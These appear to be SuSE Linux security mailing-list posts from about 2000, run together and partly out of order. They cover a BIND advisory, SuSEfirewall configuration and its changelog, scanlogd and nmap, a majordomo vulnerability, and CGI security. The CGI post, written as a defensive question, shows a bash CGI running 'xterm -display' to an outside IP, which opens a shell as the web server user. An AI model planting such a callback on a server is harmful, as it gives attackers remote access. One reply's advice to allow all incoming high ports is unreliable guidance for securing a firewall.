Hi, I'm sorry if I revive an old thread, but the last bind update on the SuSE FTP is bind-8.2.2-8, which really is 8.2.2-P3. This version is not completely trusted. Quoting from http://www.isc.org/bind.html: "If you are running BIND 8.2.2-P3, and compiled it yourself, we recommend you upgrade to 8.2.2-P5 to correct a named-xfer problem. If your vendor-provided BIND is 8.2.2-P3, you should consult their documentation and confirm that the named-xfer bug has been patched." I checked the files in /usr/doc/packages/bind8/, but I didn't see anything about it (only a bug report about 8.2.2-REL and xfer). Hi, so it's like this? you--->(dialup)--->internet---->your-firewall--->nt_server ? no wonder that pc-anywhere doesn't work :) because you are using non-public ip addresses on the inside, this can't work. there are ways to do this, but this is pretty complex. if it looks like this: (internal network) you--->your-firewall--->nt_server (plus internet here) it should work without problems. this config is wrong anyway: FW_TCP_ALLOW_INCOMING_HIGHPORTS="ftp-data 5632" better use "yes" for both TCP and UDP. the risks are not really bigger than using "ftp-data" and "dns", and more protocols/tools will work. Hi all, I am looking for an Mail-Virus-Scanner, allready tested AMAVIS with McAfee but not very happy (see security problems with amavis). Have you some other solutions? (Comercial Solutions also) btw. Hi folks! Much much work have been put into the new version of SuSEfirewall-1.9. This will be (hopefully) the last beta before the official v2.0 rpm update. So please, everyone who has got time and pleasure, check this beast out. You'll have to re-edit the rc.firewall, because variable names were changed. Many things: CHANGES v1.9 24.01.00 (beta version) * If an error occurs, firewall rules will be reset now! (plus msg print) * Added support for a DMZ in rc.firewall (FW_DEV_DMZ, FW_ALLOW_PING_DMZ) * Restructured rc.firewall and renamed some variables !!! * Moved code from "firewall" to "SuSEfirewall close" * Cleaned up the "firewall" init.d script * Removed empty lines in the error output * Now aliased interfaces should be supported ("eth0:1"). scanlogd+nmap

hi guys, i have a few questions concerning nmap + scanlogd. is it necessary to start the scanlogd on a firewall ??? i don´t think that scanlogd can detect any scan if all incoming connections are blocked (except, of course, connections to the dmz). after i scaned my host, nmap reports that all udp ports are open. but they are not. its the nmap version that ships with suse6.3. any ideas ??? thanks in advance, juergen

majordomo vulnerability

Hi, the mailinglist software "majordomo" was found having several local vulnerabilties. However, the licence of the program prohibites us providing a fix! :-( You should either remove majordomo or trust your local users until an official fix from greatcircles is available (which we will distribute for SuSE customers too then of course). Sorry guys, thats all we can do at the moment. (that problem affects all other linux and bsd distributions as well ...) cgis and security

Hallo, When a user that has cgi-Access writes a cgi that looks like this: --------------schnipp-------------- #!/bin/bash # xterm -display 123.45.67.89 --------------schnapp-------------- ... (and inserts his own IP of course) he gets an xterm on his screen running as wwwrun. So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this? Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for? Ciao, Gerhard

We have SUSE 1.4 firewall installed on our gateway. I use PC-Anywhere to admin NT-servers behind the firewall. Since the upgrade from suse 6.0 to 6.3 and FW 1.4 (newest download) I dont come through.
